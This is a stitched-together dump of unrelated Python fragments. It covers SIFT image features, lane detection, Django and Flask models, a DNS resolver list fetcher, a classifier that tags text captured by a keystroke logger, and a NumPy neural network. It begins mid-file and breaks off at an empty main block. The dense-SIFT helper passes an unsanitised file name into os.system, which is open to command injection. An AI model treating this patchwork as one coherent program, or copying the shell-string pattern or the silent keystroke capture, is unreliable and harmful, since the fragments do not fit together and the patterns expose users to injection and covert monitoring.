assert not solution.checkAlmostEquivalent("aaaa", "bccb")
assert solution.checkAlmostEquivalent("abcdeef", "abaaacc")
assert solution.checkAlmostEquivalent("cccddabba", "babababab")
|
from PIL import Image
from n1_local_image_descriptors import sift
from numpy import *
from pylab import *
import os
def process_image_dsift(imagename, resultname, size=20, steps=10,
                        force_orientation=False, resize=None):
    """ Process an image with densely sampled SIFT descriptors
    and save the results in a file. Optional input: size of features,
    steps between locations, forcing computation of descriptor orientation
    (False means all are oriented upward), tuple for resizing the image.

    Relies on an external ``sift`` binary being on PATH; intermediate
    data goes through tmp.pgm / tmp.frame in the working directory.

    Fixes: `resize != None` -> `is not None`; the command string is built
    once instead of duplicating the whole expression in both branches.
    """
    im = Image.open(imagename).convert('L')  # work in grayscale
    if resize is not None:
        im = im.resize(resize)
    m, n = im.size
    if imagename[-3:] != 'pgm':
        # the sift binary reads pgm input; convert via a temporary file
        im.save('tmp.pgm')
        imagename = 'tmp.pgm'
    # create a dense grid of frames (x, y, scale, orientation=0) and save it
    scale = size / 3.0
    x, y = meshgrid(range(steps, m, steps), range(steps, n, steps))
    xx, yy = x.flatten(), y.flatten()
    frame = array([xx, yy, scale * ones(xx.shape[0]), zeros(xx.shape[0])])
    savetxt('tmp.frame', frame.T, fmt='%03.3f')
    # --orientations lets the binary compute descriptor orientations;
    # otherwise all descriptors are oriented upward
    cmmd = ("sift " + imagename + " --output=" + resultname +
            " --read-frames=tmp.frame")
    if force_orientation:
        cmmd += " --orientations"
    os.system(cmmd)
    print('processed', imagename, 'to', resultname)
def example():
    """Demo: dense-SIFT 'empire.jpg' (size 90, step 40, with orientations),
    then read the features back and plot them over the image."""
    process_image_dsift('empire.jpg','empire.sift',90,40,True)
    l,d = sift.read_features_from_file('empire.sift')
    im = array(Image.open('empire.jpg'))
    sift.plot_features(im,l, True)
    show()
# example() |
from typing import List
from base.Event import Event
class PartialMatch:
    """
    A partial match created at some intermediate stage during evaluation.
    Caches the earliest and latest event timestamps for quick time-window
    checks.
    """
    def __init__(self, events: List[Event]):
        self.events = events
        timestamps = [event.timestamp for event in events]
        self.first_timestamp = min(timestamps)
        self.last_timestamp = max(timestamps)

    def __repr__(self):
        return "PartialMatch with events={}, first_timestamp={}, last_timestamp={}".format(
            self.events, self.first_timestamp, self.last_timestamp
        )
|
import cv2
import numpy as np
def mke_coordinate(image, line_param):
    """Convert a (slope, intercept) pair into pixel endpoints [x1, y1, x2, y2]:
    the segment spans from the bottom edge of the image up to 3/5 of its
    height."""
    slope, intercept = line_param
    bottom_y = int(image.shape[0])
    top_y = int(bottom_y * (3 / 5))
    bottom_x = int((bottom_y - intercept) / slope)
    top_x = int((top_y - intercept) / slope)
    return np.array([bottom_x, bottom_y, top_x, top_y])
def avarage_line_intercept(image, lines):
    """Average the Hough segments into one left and one right lane line,
    returned as an array of two [x1, y1, x2, y2] rows.

    Fix: np.polyfit was called as polyfit((x1, y1), (x2, y2), 1), i.e. one
    endpoint's coordinates as x-data and the other's as y-data. Fitting a
    line through the two endpoints requires polyfit((x1, x2), (y1, y2), 1).
    """
    left_fit = []
    right_fit = []
    for line in lines:
        x1, y1, x2, y2 = line.reshape(4)
        slope, intercept = np.polyfit((x1, x2), (y1, y2), 1)
        # Image y grows downward, so left-lane segments have negative slope.
        if slope < 0:
            left_fit.append((slope, intercept))
        else:
            right_fit.append((slope, intercept))
    left_line = mke_coordinate(image, np.average(left_fit, axis=0))
    right_line = mke_coordinate(image, np.average(right_fit, axis=0))
    return np.array([left_line, right_line])
def canny(image):
    """Edge-detect an RGB frame: grayscale, 5x5 Gaussian blur, then Canny
    with thresholds 50/150."""
    grayscale = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
    blurred = cv2.GaussianBlur(grayscale, (5, 5), 0)
    return cv2.Canny(blurred, 50, 150)
def display_line(image, lines):
    """Render each [x1, y1, x2, y2] segment as a thick blue line on a black
    canvas the same shape as `image`; tolerates lines being None."""
    line_image = np.zeros_like(image)
    if lines is not None:
        for segment in lines:
            x1, y1, x2, y2 = segment.reshape(4)
            cv2.line(line_image, (x1, y1), (x2, y2), (255, 0, 0), 10)
    return line_image
def region_of_interest(image):
    """Black out everything outside a fixed triangular road region whose
    base sits on the bottom edge of the frame."""
    height = image.shape[0]
    triangle = np.array([
        [(200, height), (1100, height), (550, 250)]
    ])
    mask = np.zeros_like(image)
    cv2.fillPoly(mask, triangle, 210)
    return cv2.bitwise_and(image, mask)
# --- demo pipeline on a single still image ---
image = cv2.imread("test_image.jpg")
lane_image = np.copy(image)  # work on a copy so the original frame stays intact
cany_image = canny(lane_image)
croped_image = region_of_interest(cany_image)
# probabilistic Hough transform: 2px / 1-degree resolution, 100-vote threshold
line = cv2.HoughLinesP(croped_image, 2, np.pi/180, 100, np.array([]), minLineLength=40, maxLineGap =5)
avarage_line = avarage_line_intercept(lane_image,line)
line_image = display_line(lane_image,avarage_line)
# overlay the detected lane lines on the original frame and show it
combo_image = cv2.addWeighted(lane_image, 0.8, line_image, 1, 1)
cv2.imshow("results",combo_image)
cv2.waitKey(0)
from django.contrib import admin
# Register your models here.
from django.contrib.auth.admin import UserAdmin
from .forms import CustomUserCreationForm, CustomUserChangeForm
from .models import CustomUser
class CustomUserAdmin(UserAdmin):
    """Admin configuration for CustomUser: use the custom creation/change
    forms and show email, username and age in the changelist."""
    add_form = CustomUserCreationForm
    form = CustomUserChangeForm
    list_display = ['email', 'username', 'age']
    model = CustomUser


admin.site.register(CustomUser, CustomUserAdmin)
import json
from app import db
class Game(db.Model):
    """One chat's game session, keyed by the chat id."""
    __tablename__ = 'games'
    id = db.Column(db.String, primary_key=True)
    state = db.Column(db.Text)
    song = db.Column(db.Text)
    scores = db.Column(db.Text)
    difficulty = db.Column(db.Text)
    def __init__(self, chatId, state, song=None, scores=json.dumps(dict()), difficulty=50):
        # The scores default is a JSON string (immutable), so the shared
        # default-argument value is safe. NOTE(review): difficulty defaults
        # to the int 50 although the column is Text -- confirm intended type.
        self.id = chatId
        self.state = state
        self.song = song
        self.scores = scores
        self.difficulty = difficulty
    def __repr__(self):
        return '<Game %r>' % self.state
|
from app import db
from app.models import User, Post
def cleanAll():
    """Delete every User and Post row in one commit and report the counts."""
    users = User.query.all()
    for user in users:
        db.session.delete(user)
    posts = Post.query.all()
    for post in posts:
        db.session.delete(post)
    db.session.commit()
    print('\ndeleted users={} posts={}'.format(len(users), len(posts)))
# Smoke-test script: wipe the tables, create sample users and a post,
# print them from several query angles, then wipe everything again.
cleanAll()
u = User(username='john', email='john@example.com')
db.session.add(u)
u = User(username='susan', email='susan@example.com')
db.session.add(u)
db.session.commit()
print('\nusers')
users = User.query.all()
for u in users:
    print(u.id, u.username)
u = users[0]
u = User.query.get(u.id)  # re-fetch by primary key
p = Post(body='my first post!', author=u)
db.session.add(p)
db.session.commit()
posts = u.posts.all()
print('\nall posts')
print(posts)
u = users[0]
print('\nposts of user ' + u.username)
print(u.posts.all())
u = users[1]
print('\nposts of user ' + u.username)
print(u.posts.all())
print('\nall posts')
posts = Post.query.all()
for p in posts:
    print(p.id, p.author.username, p.body)
print('\nusers')
# list users in reverse alphabetical order
users = User.query.order_by(User.username.desc()).all()
for u in users:
    print(u.id, u.username)
cleanAll()
# Fix: Python 2 print statements are a SyntaxError under Python 3.
print("hallo")
print("test")
from fake_useragent import UserAgent
import json
from . import module_helpers
class DnsServers(module_helpers.RequestsHelpers):
    """
    A set of functions to find resolvers to use
    of high quality.
    """
    def __init__(self):
        """
        Init class structure.
        """
        module_helpers.RequestsHelpers.__init__(self)
        self.ua = UserAgent()
        self.nameservers = []      # raw server records from the API
        self.nameserver_ips = []   # IPs of fully-reliable resolvers only
    def populate_servers(self):
        """
        Populate server list.

        Fetches the US public-DNS server list, then filters it down to
        100%-reliable resolvers via clean_servers().
        :return: NONE
        """
        data, status = self.request_json(
            'https://public-dns.info/nameserver/us.json')
        if status:
            data = json.loads(data)
            for d in data:
                self.nameservers.append(d)
            self.clean_servers()
    def populate_config(self, json_config):
        """
        Populate the json config file at runtime with
        public dns servers.

        Only the first 10 resolver IPs are used.
        :param json_config: start JSON config
        :return: json_config: final JSON config
        """
        json_config['resolvers'] = self.nameserver_ips[0:10]
        return json_config
    def clean_servers(self):
        """
        Sort name servers.

        Keeps only resolvers whose reported reliability is exactly 1.
        :return: NONE
        """
        for i in self.nameservers:
            # check for 100% reliability
            if i['reliability'] == 1:
                self.nameserver_ips.append(i['ip'])
    def count_resolvers(self):
        """
        Count resolvers.
        :return: INT nameserver list count
        """
        return len(self.nameserver_ips)
|
from flask import Flask, render_template

app = Flask(__name__)


@app.route('/')
def hello_world():
    """Landing-page placeholder."""
    return 'Hello World!'


@app.route('/recipes/')
def recipe_list():
    """Recipe index placeholder."""
    return 'list goes here'


# Parameterised route kept for reference; the static route below is live.
#@app.route('/recipes/<recipe>')
@app.route('/recipes/recipe')
def display_recipe():
    """Render a single (currently hard-coded) recipe page."""
    #return 'Recipe %d', recipe
    return render_template('recipes/recipe.html')


if __name__ == '__main__':
    app.run()
|
from django.db import models
class User(models.Model):
    """An OpenID-authenticated user account."""
    ID = models.AutoField(primary_key = True)
    Name = models.CharField(max_length = 30)
    # OpenID identifier; unique per user.
    OpenID = models.CharField(max_length = 100, unique = True)
    # Current session token.
    Session = models.CharField(max_length = 100)
class Education(models.Model):
    """One education record (degree programme) belonging to a User."""
    # (stored value, human-readable label)
    EDUCATION_TYPE = (
        ('U', 'Undergraduate'),
        ('M', 'Master'),
        ('D', 'Doctor'),
    )
    ID = models.AutoField(primary_key = True)
    # Owning user; cascade-deleted with the user.
    Student = models.ForeignKey(User, on_delete = models.CASCADE, related_name = "Education")
    StartYear = models.IntegerField()
    Department = models.CharField(max_length = 30)
    Type = models.CharField(max_length = 30, choices = EDUCATION_TYPE)
class Activity(models.Model):
    """An event users can sign up for and check in to."""
    # Lifecycle states; stored as the integer, displayed as the label.
    STATUS_TYPE_ACTIVITY = (
        (0, 'Except'),
        (1, 'BeforeSignup'),
        (2, 'Signup'),
        (3, 'SignupPaused'),
        (4, 'SignupStopped'),
        (5, 'Signin'),
        (6, 'SigninPaused'),
        (7, 'Finish'),
    )
    ID = models.AutoField(primary_key = True)
    Name = models.CharField(max_length = 100)
    Place = models.CharField(max_length = 100)
    # Times are stored as plain integers — presumably UNIX timestamps;
    # TODO confirm against the callers.
    StartTime = models.IntegerField()
    EndTime = models.IntegerField()
    SignUpStartTime = models.IntegerField()
    SignUpEndTime = models.IntegerField()
    # Capacity bookkeeping: minimum required, currently joined, maximum.
    MinUser = models.IntegerField()
    CurrentUser = models.IntegerField()
    MaxUser = models.IntegerField()
    Type = models.CharField(max_length = 100)
    Status = models.IntegerField(choices = STATUS_TYPE_ACTIVITY)
    # Whether the activity shows up in searches.
    CanBeSearched = models.BooleanField()
    # TODO: rule
class JoinInformation(models.Model):
    """Join/attendance record linking a User to an Activity."""
    STATUS_TYPE_JOIN = (
        (0, "WaitValidate"),
        (1, "Joined"),
        (2, "NotChecked"),
        (3, "Checked"),
        (4, "Finished"),
        (5, "Missed"),
    )
    ROLE_TYPE_JOIN = (
        (0, "Common"),
        (1, "Manager"),
        (2, "Creator")
    )
    ID = models.AutoField(primary_key = True)
    # Times stored as integers — presumably UNIX timestamps; confirm.
    JoinTime = models.IntegerField()
    CheckTime = models.IntegerField()
    Status = models.IntegerField(choices = STATUS_TYPE_JOIN)
    Role = models.IntegerField(choices = ROLE_TYPE_JOIN)
    # NOTE(review): both FKs use related_name="History"; User.History and
    # Activity.History point at different managers — legal but confusing.
    UserId = models.ForeignKey(User, on_delete = models.CASCADE, related_name = "History")
    ActivityId = models.ForeignKey(Activity, on_delete = models.CASCADE, related_name = "History")
    # TODO: payment handling, etc.
import threading
from sklearn.externals import joblib
from tag_from_text_model import LogisticRegressionIntentClassifier
from logger import Logger
class TextClassifier:
    """Couples a key logger with a pre-trained intent classifier so the
    text the user is currently typing can be tagged."""

    def __init__(self, model_filename='model.joblib'):
        # Logger takes what appears to be a screen size (1920x1080) —
        # TODO confirm against the Logger constructor.
        self.key_logger = Logger(1920, 1080)
        self.classifier = LogisticRegressionIntentClassifier.load(model_filename)

    def run(self):
        """Start capturing keystrokes (delegates to the logger)."""
        self.key_logger.run()

    def get_text_tags(self):
        """Classify the currently captured text.

        Returns a dict mapping each known tag to 0/1, with exactly the
        predicted tag set to 1.
        """
        text_tags = self.classifier.predict([self.key_logger.get_key_info().text])[0]
        # NOTE(review): "_empty__" has an odd underscore imbalance —
        # verify it matches the model's label set exactly.
        types = ["document", "code", "message", "_empty__"]
        res = {key: 0 for key in types}
        res[text_tags] = 1
        return res
# Ad-hoc smoke test: poll the classifier every 10 seconds.
import time

if __name__ == '__main__':
    clf = TextClassifier()
    for i in range(10):
        time.sleep(10)
        print(clf.get_text_tags())
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.3 on 2016-07-27 20:31
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated (Django 1.9): adds the CATALUMNO and ID_ALUMNO
    tables and links them with a cascading foreign key."""

    dependencies = [
        ('siwedeeapp', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='CATALUMNO',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('MATRICULA', models.IntegerField()),
                ('IDPROCESO', models.IntegerField(null=True)),
                ('IDCARRERA', models.IntegerField(null=True)),
                ('IDEMPRESA', models.IntegerField(null=True)),
                ('ACTIVO', models.BooleanField()),
            ],
        ),
        migrations.CreateModel(
            name='ID_ALUMNO',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('idalumno', models.IntegerField()),
            ],
        ),
        # FK added after both tables exist.
        migrations.AddField(
            model_name='catalumno',
            name='IDALUMNO',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='siwedeeapp.ID_ALUMNO'),
        ),
    ]
|
import numpy as np
import pickle
import copy
import matplotlib.pyplot as plt
import statistics
from os import listdir
from PIL import Image
# Hyper-parameters for the network and training loop. Read as a module-
# level global by Neuralnetwork, update_weight and the plotting helpers.
config = {}
config['layer_specs'] = [784,50,10] # The length of list denotes number of hidden layers; each element denotes number of neurons in that layer; first element is the size of input layer, last element is the size of output layer.
config['activation'] = 'tanh' # Takes values 'sigmoid', 'tanh' or 'ReLU'; denotes activation function for hidden layers
config['batch_size'] = 1000 # Number of training samples per batch to be passed to network
config['epochs'] = 200 # Number of epochs to train the model
config['early_stop'] = False # Implement early stopping or not
config['early_stop_epoch'] = 5 # Number of epochs for which validation loss increases to be counted as overfitting
config['L2_penalty'] = 0 # Regularization constant
config['momentum'] = False # Denotes if momentum is to be applied or not
config['momentum_gamma'] = 0.7 # Denotes the constant 'gamma' in momentum expression
config['learning_rate'] = 0.001 # Learning rate of gradient descent algorithm
def softmax(x):
    """Row-wise softmax of a 2-D array of logits.

    Fix: subtract the per-row maximum before exponentiating so large
    logits cannot overflow np.exp; the shift cancels out mathematically
    and leaves the result unchanged for inputs that did not overflow.

    :param x: (batch, classes) array of logits
    :return: (batch, classes) array of probabilities; each row sums to 1
    """
    shifted = x - np.max(x, axis=1, keepdims=True)
    exps = np.exp(shifted)
    return exps / np.sum(exps, axis=1, keepdims=True)
def oneHot(Y_oh, max_val):
    """Encode a sequence of numeric labels as one-hot rows.

    Input: Y_oh: iterable of numeric labels
           max_val: the largest possible label value
    Returns: numpy array of shape (len(Y_oh), max_val + 1); row i has a
             1 in column int(Y_oh[i]) and 0 elsewhere.
    """
    width = int(max_val) + 1

    def encode(label):
        row = [0] * width
        row[int(label)] = 1
        return row

    return np.array([encode(label) for label in Y_oh])
def load_data(fname):
    """
    Read a pickled MNIST split from ./data and return (images, labels).

    Each pickle row holds 784 pixel values followed by the label in
    column 784.  Images are min-max normalised per sample; labels are
    one-hot encoded with 10 classes (labels 0-9, hard-coded).
    fname : file name inside the data/ folder
    """
    fname = 'data/' + fname
    # NOTE(review): the file object is never closed; latin1 encoding is
    # the usual shim for py2-era pickles.
    training_data = pickle.load(open(fname, 'rb'), encoding='latin1')
    images = normalize_data(training_data[:, :784])
    labels = oneHot(training_data[:, 784], 9)
    print("Total number of images:", len(images), "and labels:", len(labels))
    return images, labels
def normalize_data(img):
    """Min-max scale each row (sample) of *img* into [0, 1].

    Equivalent to the transpose-normalise-transpose original, expressed
    directly with keepdims broadcasting.
    """
    lo = img.min(axis=1, keepdims=True)
    hi = img.max(axis=1, keepdims=True)
    return (img - lo) * (1 / (hi - lo))
class Activation:
    """Element-wise activation pseudo-layer (sigmoid / tanh / ReLU) with
    the same forward/backward interface as Layer."""

    def __init__(self, activation_type = "sigmoid"):
        self.activation_type = activation_type
        self.x = None  # Save the input 'x' for sigmoid or tanh or ReLU to this variable since it will be used later for computing gradients.

    def forward_pass(self, a):
        """Apply the configured activation to *a* (caches *a* inside)."""
        if self.activation_type == "sigmoid":
            return self.sigmoid(a)
        elif self.activation_type == "tanh":
            return self.tanh(a)
        elif self.activation_type == "ReLU":
            return self.ReLU(a)

    def backward_pass(self, delta):
        """Chain-rule step: elementwise activation gradient times *delta*."""
        if self.activation_type == "sigmoid":
            grad = self.grad_sigmoid()
        elif self.activation_type == "tanh":
            grad = self.grad_tanh()
        elif self.activation_type == "ReLU":
            grad = self.grad_ReLU()
        return grad * delta

    def sigmoid(self, x):
        """Logistic sigmoid; caches x for the backward pass."""
        self.x = x
        return 1. / (1. + np.exp(-x))

    def tanh(self, x):
        """Hyperbolic tangent; caches x for the backward pass."""
        self.x = x
        return (np.exp(x)-np.exp(-x))/(np.exp(x)+np.exp(-x))

    def ReLU(self, x):
        """Rectified linear unit; caches x for the backward pass."""
        self.x = x
        return np.multiply(x, x > 0)

    def grad_sigmoid(self):
        """sigmoid'(x) = s(x) * (1 - s(x)), evaluated at the cached x."""
        grad = np.multiply(self.sigmoid(self.x), (1-self.sigmoid(self.x)))
        return grad

    def grad_tanh(self):
        """tanh'(x) = 1 - tanh(x)^2, evaluated at the cached x."""
        grad = 1-(self.tanh(self.x)**2)
        return grad

    def grad_ReLU(self):
        """ReLU'(x): 1 where x >= 0, else 0 (sub-gradient 1 taken at 0)."""
        grad = np.ones(self.x.shape)
        grad[(self.x < 0)] = 0
        return grad
class Layer():
    """One fully-connected linear layer: a = x.W + b."""

    def __init__(self, in_units, out_units):
        # Fixed seed, so every layer (and every run) starts identically.
        np.random.seed(42)
        self.w = np.random.randn(in_units, out_units)  # Weight matrix
        self.b = np.zeros((1, out_units)).astype(np.float32)  # Bias
        self.x = None    # Save the input to forward_pass in this
        self.a = None    # Save the output of forward pass in this (without activation)
        self.d_x = None  # Save the gradient w.r.t x in this
        self.d_w = None  # Save the gradient w.r.t w in this
        self.d_b = None  # Save the gradient w.r.t b in this

    def forward_pass(self, x):
        """
        Affine transform of the batch; the activation is applied
        separately by the following Activation object.
        """
        self.x = x
        self.a = self.x.dot(self.w)+self.b
        return self.a

    def backward_pass(self, delta):
        """
        Given the delta from the next layer, compute gradients w.r.t.
        x, w and b, and return the delta for the previous layer.
        """
        self.d_x = delta.dot(self.w.T)
        self.d_w = self.x.T.dot(delta)
        self.d_b = delta.sum(axis=0)
        return self.d_x
class Neuralnetwork():
    """Feed-forward network of alternating Layer/Activation blocks with
    softmax output and averaged cross-entropy loss."""

    def __init__(self, config):
        self.layers = []     # alternating Layer / Activation objects
        self.x = None        # Save the input to forward_pass in this
        self.y = None        # Save the output vector of model in this
        self.v = []          # momentum buffers for the weights
        self.v_b = []        # momentum buffers for the biases
        self.n_l = -1        # layer index at which backward_pass may early-return
        self.targets = None  # Save the targets in forward_pass in this variable
        for i in range(len(config['layer_specs']) - 1):
            self.layers.append( Layer(config['layer_specs'][i], config['layer_specs'][i+1]) )
            # zero-initialised momentum buffers shaped like the new layer
            self.v.append(self.layers[-1].w*0)
            self.v_b.append(self.layers[-1].b*0)
            # no activation after the final (output) linear layer
            if i < len(config['layer_specs']) - 2:
                self.layers.append(Activation(config['activation']))
        print(self.layers)

    def forward_pass(self, x, targets=None):
        """
        Run x through all layers and softmax the final linear output.
        If targets == None, loss should be None. If not, then return the loss computed.
        """
        self.x = x
        self.targets = targets
        layer_in = x;
        for layer in self.layers:
            layer_in = layer.forward_pass(layer_in)
        self.y = softmax(layer_in)
        if targets is not None:
            loss = self.loss_func(self.y,targets)
        else:
            loss = None
        return loss, self.y

    def loss_func(self, logits, targets):
        '''
        find cross entropy loss between logits and targets
        (note: averaged over both batch size m AND class count n)
        '''
        m = np.array(logits).shape[0]
        n = np.array(logits).shape[1]
        #logits = np.array(logits, dtype=np.float)
        #targets = targets[mask]
        output = -(1.0 / (m * n)) * np.sum(np.multiply(targets, np.log(logits)))
        return output

    def backward_pass(self, return_flag=False):
        '''
        implement the backward pass for the whole network.
        When return_flag is True the pass stops and returns the delta
        after self.n_l layers (used only for gradient checking).
        '''
        ly = 0
        # softmax + cross-entropy delta; note the (targets - y) sign
        # convention — update_weight therefore ADDS d_w * lr.
        delta = (self.targets - self.y)
        if return_flag:
            for l in reversed(self.layers):
                delta = l.backward_pass(delta)
                if ly == self.n_l:
                    return delta
                ly += 1
        else:
            for l in reversed(self.layers):
                delta = l.backward_pass(delta)

    def update_weight(self):
        '''
        implement the weight update for each layer
        :return: none
        '''
        lr = config['learning_rate']
        gamma = config['momentum_gamma']
        m = config['momentum']  # bool: multiplying by it zeroes momentum terms when off
        lam = config['L2_penalty']
        i = 0
        for l in self.layers:
            if isinstance(l, Layer):
                # NOTE(review): gradients are added (+=) because delta is
                # (targets - y); the L2 term is ALSO added (`+ lam*l.w`),
                # which grows rather than decays weights — confirm the
                # intended sign of the regulariser.
                l.w = l.w + l.d_w*lr + self.v[i]*gamma*m + lam*l.w
                l.b = l.b + l.d_b*lr + self.v_b[i]*gamma*m + lam*l.b
                #l.b = l.b + l.d_w*lr
                #print(i)
                self.v[i] = self.v[i]*gamma*m + l.d_w*lr
                self.v_b[i] = self.v_b[i]*gamma*m + l.d_b*lr#*(1-gamma)
                i += 1
def trainer_check_gradient(model, X_train, y_train, flag = "input_to_hidden_w_1"):
    """Numerically check one backprop gradient against a central difference.

    Perturbs a single weight/bias (selected by *flag*) by +/-eps on two
    deep copies of *model* and compares (E+ - E-)/(2*eps) against the
    gradient produced by backward_pass on an unperturbed copy.

    Fix: the original compared *flag* with ``is``, which tests object
    identity rather than string equality — it only worked through
    CPython string interning and raises a SyntaxWarning on modern
    interpreters.  All comparisons now use ``==``.
    """
    eps = 0.01
    model_plus = copy.deepcopy(model)
    model_minus = copy.deepcopy(model)
    model_temp = copy.deepcopy(model)
    # Single-sample batch keeps the finite-difference loss cheap.
    batch_x = X_train[0:1, :]
    batch_y = y_train[0:1, :]
    [loss_train, _] = model_temp.forward_pass(batch_x, batch_y)
    model_temp.backward_pass()
    if flag == "input_to_hidden_w_1":
        model_plus.layers[0].w[0, 0] += eps
        model_minus.layers[0].w[0, 0] -= eps
        bp_gradient = model_temp.layers[0].d_w[0, 0]
    if flag == "input_to_hidden_w_2":
        model_plus.layers[0].w[1, 1] = model_plus.layers[0].w[1, 1] + eps
        model_minus.layers[0].w[1, 1] = model_minus.layers[0].w[1, 1] - eps
        bp_gradient = model_temp.layers[0].d_w[1, 1]
    if flag == "hidden_to_output_w_1":
        model_plus.layers[-1].w[1, 1] = model_plus.layers[-1].w[1, 1] + eps
        model_minus.layers[-1].w[1, 1] = model_minus.layers[-1].w[1, 1] - eps
        bp_gradient = model_temp.layers[-1].d_w[1, 1]
    if flag == "hidden_to_output_w_2":
        model_plus.layers[-1].w[0, 1] = model_plus.layers[-1].w[0, 1] + eps
        model_minus.layers[-1].w[0, 1] = model_minus.layers[-1].w[0, 1] - eps
        bp_gradient = model_temp.layers[-1].d_w[0, 1]
    if flag == "hidden_b_1":
        model_plus.layers[2].b[0][0] = model_plus.layers[2].b[0][0] + eps
        model_minus.layers[2].b[0][0] = model_minus.layers[2].b[0][0] - eps
        bp_gradient = model_temp.layers[2].d_b[0]
    if flag == "output_b_1":
        model_plus.layers[-1].b[0][0] = model_plus.layers[-1].b[0][0] + eps
        model_minus.layers[-1].b[0][0] = model_minus.layers[-1].b[0][0] - eps
        bp_gradient = model_temp.layers[-1].d_b[0]
    # Rescale by 1/10 — presumably to match the 1/(m*n) loss averaging
    # over the n=10 output classes; TODO confirm.
    bp_gradient = bp_gradient / 10
    [loss_train_minus, _] = model_minus.forward_pass(batch_x, batch_y)
    [loss_train_plus, _] = model_plus.forward_pass(batch_x, batch_y)
    cal_gradient = (loss_train_plus - loss_train_minus) / (2 * eps)
    print(flag + " " + str(abs(cal_gradient) - abs(bp_gradient)))
    line = flag + " bp_gradient is " + str(bp_gradient) + " (E_plus-E_minus)/2e = " +\
        str(cal_gradient) + " Error of eps plus is "\
        + str(loss_train_plus) + " Error of eps minus is " + str(loss_train_minus)
    print(line)
def trainer(model, X_train, y_train, X_valid, y_valid, config):
    """
    Mini-batch training loop with optional early stopping.

    Per epoch: iterate batches (forward, backward, weight update),
    record the post-update batch loss/accuracy, then evaluate on the
    validation set.  With config['early_stop'], training stops after
    early_stop_epoch consecutive epochs of rising validation loss.
    Plots loss and accuracy curves at the end.
    """
    loss_train_overall = []
    loss_valid_overall = []
    acc_train_overall = []
    acc_valid_overall = []
    loss_train_batch = []
    #loss_valid_batch = []
    acc_train_batch = []
    #acc_valid_batch = []
    loss_valid = float('inf')  # validation loss of the previous epoch
    num = 0                    # consecutive epochs with rising validation loss
    for i in range(config['epochs']):
        for j in range(len(X_train)):
            start = j*config['batch_size']
            end = (j+1)*config['batch_size']
            if start >= len(X_train):
                break
            batch_x = X_train[start:end,:]
            batch_y = y_train[start:end,:]
            [loss_train_temp, prediction] = model.forward_pass(batch_x, batch_y)
            model.backward_pass()
            model.update_weight()
            # Second forward pass measures the *post-update* batch loss.
            [loss_train_mini, pred_t_mini] = model.forward_pass(batch_x, batch_y)
            #[loss_valid_mini, pred_v_mini] = model.forward_pass(X_valid, y_valid)
            acc_train_mini = accuracy(pred_t_mini, batch_y)
            #acc_valid_mini = accuracy(pred_v_mini, y_valid)
            # NOTE(review): these lists are never cleared, so the per-epoch
            # mean below covers ALL batches so far, not just this epoch —
            # confirm whether that smoothing is intentional.
            loss_train_batch.append(loss_train_mini)
            #loss_valid_batch.append(loss_valid_mini)
            acc_train_batch.append(acc_train_mini)
            #acc_valid_batch.append(acc_valid_mini)
        [loss_valid_temp, pred_v] = model.forward_pass(X_valid, y_valid)
        #[loss_train_temp, pred_t] = model.forward_pass(X_train, y_train)
        loss_train_avg = statistics.mean(loss_train_batch)
        #loss_valid_avg = statistics.mean(loss_valid_batch)
        acc_train_avg = statistics.mean(acc_train_batch)
        acc_valid_temp = accuracy(pred_v, y_valid)
        loss_train_overall.append(loss_train_avg)
        loss_valid_overall.append(loss_valid_temp)
        acc_train_overall.append(acc_train_avg)
        acc_valid_overall.append(acc_valid_temp)
        if config['early_stop'] == True:
            if loss_valid_temp <= loss_valid:
                loss_valid = loss_valid_temp
                num = 0
            else:
                num += 1
                # compares against the PREVIOUS epoch, not the best seen
                loss_valid = loss_valid_temp
                if num > config['early_stop_epoch']:
                    line = "Early stop iteration " + str(i) + " training loss is " + str(loss_train_avg) + " validation loss " + str(loss_valid_temp)
                    line2 = "Training accuracy " + str(acc_train_avg) + " Validation accuracy " + str(acc_valid_temp)
                    print(line)
                    print(line2)
                    #display_loss(loss_train_overall,loss_valid_overall)
                    #display_accuracy(acc_train_overall, acc_valid_overall)
                    break
        line = "Epoch " + str(i) + " training loss is " + str(loss_train_avg) + " validation loss " + str(loss_valid_temp)
        print(line)
        line_1 = "Training acc is " + str(acc_train_avg) + " Validation accuracy " + str(acc_valid_temp)
        print(line_1)
    display_loss(loss_train_overall, loss_valid_overall)
    display_accuracy(acc_train_overall, acc_valid_overall)
def accuracy(pred, t):
    """Fraction of rows where the argmax of *pred* matches the argmax of *t*."""
    matches = pred.argmax(axis=1) == t.argmax(axis=1)
    return sum(matches) / pred.shape[0]
def test(model, X_test, y_test, config):
    """
    Run the model on X_test and return classification accuracy.

    *config* is accepted for signature symmetry with trainer() but is
    unused.  forward_pass is called without targets, so the loss slot
    is None and discarded.
    """
    [_,prediction] = model.forward_pass(X_test)
    return accuracy(prediction,y_test)
def display_loss(loss_train,loss_vali):
    """Plot training vs validation cross-entropy loss per epoch.

    Reads the module-level *config* for the title; blocks on plt.show().
    """
    epc = list(range(len(loss_train)))
    epc = [x + 1 for x in epc]  # 1-based epoch axis
    plt.plot(epc, loss_train, label='cross entropy loss_train')
    plt.plot(epc, loss_vali, label='cross entropy loss_validation')
    plt.title('Losses versus training epochs at learning rate ' + str(config['learning_rate']) +
              ' Momentum ' + str(config['momentum_gamma']) + ' L2 ' + str(config['L2_penalty']))
    plt.xlabel('Number of epochs')
    plt.ylabel('Loss over epochs')
    plt.legend(bbox_to_anchor=(1, 1), loc='upper right', ncol=1)
    plt.show()
def display_accuracy(acc_train,acc_vali):
    """Plot training vs validation accuracy per epoch.

    Reads the module-level *config* for the title; blocks on plt.show().
    """
    epc = list(range(len(acc_train)))
    epc = [x + 1 for x in epc]  # 1-based epoch axis
    plt.plot(epc, acc_train, label='acc of train')
    plt.plot(epc, acc_vali, label='acc of validation')
    plt.title('Accuracy versus training epochs at learning rate ' + str(config['learning_rate']) +
              ' Momentum ' + str(config['momentum_gamma']) + ' L2 ' + str(config['L2_penalty']))
    plt.xlabel('Number of epochs')
    plt.ylabel('Accuracy over epochs')
    plt.legend(bbox_to_anchor=(1, 1), loc='upper right', ncol=1)
    plt.show()
if __name__ == "__main__":
